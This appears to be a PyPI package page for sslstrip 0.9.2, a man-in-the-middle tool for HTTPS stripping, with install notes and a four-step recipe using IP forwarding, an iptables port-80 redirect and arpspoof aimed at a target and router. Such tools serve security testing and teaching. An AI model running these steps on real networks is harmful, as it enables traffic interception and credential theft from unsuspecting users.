Skip to main content

A MITM tool that implements Moxie Marlinspike's HTTPS stripping attacks.

Project description

sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks.

It requires Python 2.5 or newer, along with the ‘twisted’ python module.

Installing:
pip install sslstrip
Running:

sslstrip can be run from the source base without installation. Just run ‘python sslstrip.py -h’ as a non-root user to get the command-line options.

The four steps to getting this working (assuming you’re running Linux) are:

  1. Flip your machine into forwarding mode (as root): echo “1” > /proc/sys/net/ipv4/ip_forward
  2. Setup iptables to intercept HTTP requests (as root): iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port <yourListenPort>
  3. Run sslstrip with the command-line options you’d like (see above).
  4. Run arpspoof to redirect traffic to your machine (as root): arpspoof -i <yourNetworkdDevice> -t <yourTarget> <theRoutersIpAddress>
More Info:
http://www.thoughtcrime.org/software/sslstrip/

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Files for sslstrip, version 0.9.2
Filename, size File type Python version Upload date Hashes
Filename, size sslstrip-0.9.2.tar.gz (9.2 kB) File type Source Python version None Upload date Hashes View

Supported by

Pingdom Pingdom Monitoring Google Google Object Storage and Download Analytics Sentry Sentry Error logging AWS AWS Cloud computing DataDog DataDog Monitoring Fastly Fastly CDN DigiCert DigiCert EV certificate StatusPage StatusPage Status page